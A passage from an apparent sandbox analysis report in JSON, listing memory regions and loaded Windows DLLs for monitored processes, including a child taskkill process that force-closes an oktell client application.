null, "size": 376832, "start_va": 1784348672, "type": "region", "version": 1 }, "end_va": 1784725503, "entry_point": 1784490824, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_3507", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1784348672, "timestamp": "00:01:28.129", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1785856000, "type": "region", "version": 1 }, "end_va": 1785896959, "entry_point": 1785861274, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_3508", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1785856000, "timestamp": "00:01:28.129", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 8388608, "type": "region", "version": 1 }, "end_va": 9437183, "entry_point": 0, "filename": null, "id": "region_3509", "name": "private_0x0000000000800000", "norm_filename": null, "region_type": "private_memory", "start_va": 8388608, "timestamp": "00:01:28.133", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 9633792, "type": "region", "version": 1 }, "end_va": 9895935, "entry_point": 0, "filename": null, "id": "region_3510", "name": "private_0x0000000000930000", "norm_filename": null, "region_type": "private_memory", "start_va": 9633792, "timestamp": "00:01:28.133", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1784152064, "type": "region", "version": 1 }, "end_va": 1784319999, "entry_point": 1784179481, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_3511", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1784152064, "timestamp": "00:01:28.133", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 10354688, "type": "region", "version": 1 }, "end_va": 13299711, "entry_point": 10354688, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_3512", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 10354688, "timestamp": "00:01:28.145", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 35520512, "type": "region", "version": 1 }, "end_va": 35782655, "entry_point": 0, "filename": null, "id": "region_3513", "name": "private_0x00000000021e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35520512, "timestamp": "00:01:28.145", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36306944, "type": "region", "version": 1 }, "end_va": 36569087, "entry_point": 0, "filename": null, "id": "region_3514", "name": "private_0x00000000022a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36306944, "timestamp": "00:01:28.145", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_3515", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:28.145", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_3516", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:28.146", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_3517", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:28.147", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_3518", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:28.148", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 13959168, "type": "region", "version": 1 }, "end_va": 14221311, "entry_point": 0, "filename": null, "id": "region_3519", "name": "private_0x0000000000d50000", "norm_filename": null, "region_type": "private_memory", "start_va": 13959168, "timestamp": "00:01:28.208", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37224448, "type": "region", "version": 1 }, "end_va": 37486591, "entry_point": 0, "filename": null, "id": "region_3520", "name": "private_0x0000000002380000", "norm_filename": null, "region_type": "private_memory", "start_va": 37224448, "timestamp": "00:01:28.208", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37683200, "type": "region", "version": 1 }, "end_va": 37945343, "entry_point": 0, "filename": null, "id": "region_3521", "name": "private_0x00000000023f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37683200, "timestamp": "00:01:28.208", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38273024, "type": "region", "version": 1 }, "end_va": 38535167, "entry_point": 0, "filename": null, "id": "region_3522", "name": "private_0x0000000002480000", "norm_filename": null, "region_type": "private_memory", "start_va": 38273024, "timestamp": "00:01:28.208", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1785790464, "type": "region", "version": 1 }, "end_va": 1785851903, "entry_point": 1785799072, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_3523", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1785790464, "timestamp": "00:01:28.208", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_3524", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:28.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_3525", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:28.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1783365632, "type": "region", "version": 1 }, "end_va": 1783463935, "entry_point": 1783370549, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_3526", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1783365632, "timestamp": "00:01:28.216", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1783496704, "type": "region", "version": 1 }, "end_va": 1784111103, "entry_point": 1783625913, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_3527", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1783496704, "timestamp": "00:01:28.216", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM oktell.ClientStarter4.exe /IM oktell.ClientStarter4.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_28", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 28, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3528", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:28.436", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_3529", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:28.436", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_3530", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:28.436", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_3531", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:28.439", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_3532", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:28.439", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 851967, "entry_point": 0, "filename": null, "id": "region_3533", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:28.439", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2621439, "entry_point": 0, "filename": null, "id": "region_3534", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:01:28.439", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 16711680, "type": "region", "version": 1 }, "end_va": 16801791, "entry_point": 16735369, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_3535", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 16711680, "timestamp": "00:01:28.439", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_3536", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:28.439", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_3537", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:28.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_3538", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:28.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_3539", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:28.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_3540", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:28.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_3541", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:28.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3542", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:28.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_3543", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:28.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_3544", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:28.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 5046271, "entry_point": 0, "filename": null, "id": "region_3545", "name": "private_0x0000000000450000", "norm_filename": null, "region_type": "private_memory", "start_va": 4521984, "timestamp": "00:01:28.445", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_3546", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:28.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_3547", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:28.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_3548", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:28.447", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_3549", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:28.447", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_3550", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:28.447", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_3551", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:28.470", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3552", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:28.470", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1273855, "entry_point": 851968, "filename": "\\Windows\\System32\\locale.nls", "id": "region_3553", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 851968, "timestamp": "00:01:28.470", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 6946816, "type": "region", "version": 1 }, "end_va": 7995391, "entry_point": 0, "filename": null, "id": "region_3554", "name": "private_0x00000000006a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6946816, "timestamp": "00:01:28.471", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 10027008, "type": "region", "version": 1 }, "end_va": 10092543, "entry_point": 0, "filename": null, "id": "region_3555", "name": "private_0x0000000000990000", "norm_filename": null, "region_type": "private_memory", "start_va": 10027008, "timestamp": "00:01:28.471", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1783758848, "type": "region", "version": 1 }, "end_va": 1784721407, "entry_point": 1783763918, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_3556", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1783758848, "timestamp": "00:01:28.471", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1787428864, "type": "region", "version": 1 }, "end_va": 1787645951, "entry_point": 1787433941, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_3557", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1787428864, "timestamp": "00:01:28.471", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1787691008, "type": "region", "version": 1 }, "end_va": 1787752447, "entry_point": 1787695777, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_3558", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1787691008, "timestamp": "00:01:28.472", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1787756544, "type": "region", "version": 1 }, "end_va": 1787793407, "entry_point": 1787762086, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_3559", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1787756544, "timestamp": "00:01:28.472", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1787822080, "type": "region", "version": 1 }, "end_va": 1787891711, "entry_point": 1787826944, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_3560", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1787822080, "timestamp": "00:01:28.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_3561", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:28.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944309759, "entry_point": 1944261088, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_3562", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:28.474", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_3563", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:28.474", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_3564", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:28.475", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_3565", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:28.475", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_3566", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:28.476", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": 